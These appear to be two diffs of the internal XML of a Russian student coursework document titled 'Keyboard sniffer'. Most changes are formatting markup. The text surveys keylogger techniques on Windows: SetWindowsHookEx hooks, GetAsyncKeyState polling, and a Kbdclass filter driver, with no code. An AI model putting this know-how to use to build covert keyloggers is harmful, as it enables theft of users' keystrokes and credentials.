--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -79,6 +79,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -98,7 +99,15 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>ИНФОРМАТИКИ И РАДИОЭЛЕКТРОНИКИ</w:t>
+        <w:t>ИНФОРМАТИКИ</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> И РАДИОЭЛЕКТРОНИКИ</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -205,6 +214,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Системное программное обеспечение </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -212,6 +222,7 @@
         </w:rPr>
         <w:t>вычислительных  машин</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -400,12 +411,21 @@
         </w:rPr>
         <w:t>«</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Сниффер клавиатуры</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Сниффер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -507,6 +527,7 @@
         </w:rPr>
         <w:t xml:space="preserve">                                </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -514,6 +535,7 @@
         </w:rPr>
         <w:t>Студент:  гр.</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -547,21 +569,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Шешко В.Р</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">            Шешко В.Р.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -590,6 +598,7 @@
         </w:rPr>
         <w:t xml:space="preserve">                                                  </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -604,6 +613,7 @@
         </w:rPr>
         <w:t xml:space="preserve">   </w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -616,7 +626,23 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">                    Яночкин А.Л.</w:t>
+        <w:t xml:space="preserve">                    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Яночкин</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> А.Л.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1238,12 +1264,21 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Снифферы клавиатуры</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Снифферы</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1294,8 +1329,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> человеком, установившим эту программу.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1321,7 +1354,7 @@
           <w:sz w:val="36"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc414805628"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc414805628"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1329,7 +1362,7 @@
         </w:rPr>
         <w:t>1.Обзор литературы</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -1350,8 +1383,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Спецификация клавиатурных снифферов</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Спецификация клавиатурных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>снифферов</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1377,7 +1419,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Клавиатурный сниффер — это программное обеспечение или аппаратн</w:t>
+        <w:t xml:space="preserve">Клавиатурный </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сниффер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — это программное обеспечение или аппаратн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1415,7 +1473,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Клавиатурные снифферы подразделяются на </w:t>
+        <w:t xml:space="preserve">Клавиатурные </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>снифферы</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> подразделяются на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1436,8 +1510,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Принципиальная идея сниффера</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> Принципиальная идея </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сниффера</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1473,8 +1556,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>строению программных клавиатурных снифферов</w:t>
-      </w:r>
+        <w:t xml:space="preserve">строению программных клавиатурных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>снифферов</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1500,7 +1592,39 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции WinAPI SetWindowsHook, для того чтобы перехватить сообщения,</w:t>
+        <w:t xml:space="preserve">системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WinAPI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SetWindowsHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, для того чтобы перехватить сообщения,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1534,14 +1658,94 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>циклический опрос клавиатуры (с помощью функции WinAPI Get(Async)KeyState, GetKeyboardSta</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>te).</w:t>
+        <w:t xml:space="preserve">циклический опрос клавиатуры (с помощью функции </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>WinAPI</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Async</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>KeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>GetKeyboardSta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>te</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1568,8 +1772,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ов ОС Windows</w:t>
-      </w:r>
+        <w:t xml:space="preserve">ов ОС </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1587,12 +1800,21 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Кейлоггеры</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1644,15 +1866,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ный метод реализации клавиатурных снифферов</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Посредством вызова функции SetWindowsHookEx </w:t>
-      </w:r>
+        <w:t xml:space="preserve">ный метод реализации клавиатурных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>снифферов</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Посредством вызова функции </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1660,6 +1908,7 @@
         </w:rPr>
         <w:t>сниффер</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1738,7 +1987,39 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций GetAsynсKeyState или GetKeyState. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
+        <w:t xml:space="preserve">Состояние всех клавиш с небольшим интервалом опрашивается с помощью функций </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>GetAsynсKeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> или </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>GetKeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. Данные функции возвращают массивы асинхронного или синхронного сос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1825,8 +2106,17 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Использование драйвер-фильтра драйвера класса клавиатуры Kbdclass</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Использование драйвер-фильтра драйвера класса клавиатуры </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Kbdclass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1859,6 +2149,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -1866,19 +2157,52 @@
         </w:rPr>
         <w:t>Снифферы</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\Device\KeyboardClass0»</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, созданного драйвером Kbdclass. </w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, построенные на основе этого метода, перехватывают запросы к клавиатуре посредством установки фильтра поверх устройства «\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Device</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\KeyboardClass0»</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, созданного драйвером </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Kbdclass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1929,6 +2253,130 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="af"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>При выборе средств для разработки приложения необходимо учесть множество различных аспектов, наиболее важным из которых является язык программирования, так как он в значительной степени определяет другие доступные средства.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Для реализации клавиатурного </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сниффера</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> наиболее эффективным будет использование языков программирования </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>++.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Они предоставляют все средства для создания приложения для операционных систем семейства </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ae"/>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -2222,23 +2670,6 @@
           <w:sz w:val="32"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="-181" w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Созданная программа способна отслеживать различные типы изменений, происходящих в файловой системе, причем отслеживать их в различных комбинациях. Было продемонстрировано использование API функций, потоков, их взаимодействие используя язык программирования С++.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3167,6 +3598,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -3687,7 +4119,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{832FCA68-6817-401B-B2CD-C8BD5D69079D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{36DBC590-AC1B-4324-83E8-907116227972}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -1364,6 +1364,68 @@
       </w:r>
       <w:bookmarkEnd w:id="1"/>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В этом разделе будут рассмотрены основные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>теоретические</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> сведения, необход</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>имые для создания программы «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Сниффер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>».</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -1404,6 +1466,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1806,6 +1870,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Кейлоггеры</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1841,7 +1906,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Установка ловушки для клавиатурных сообщений</w:t>
       </w:r>
     </w:p>
@@ -2065,7 +2129,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>недостатки — отсутствие гарантии обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
+        <w:t xml:space="preserve">недостатки — отсутствие гарантии </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2105,7 +2177,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Использование драйвер-фильтра драйвера класса клавиатуры </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -2372,8 +2443,6 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="2"/>
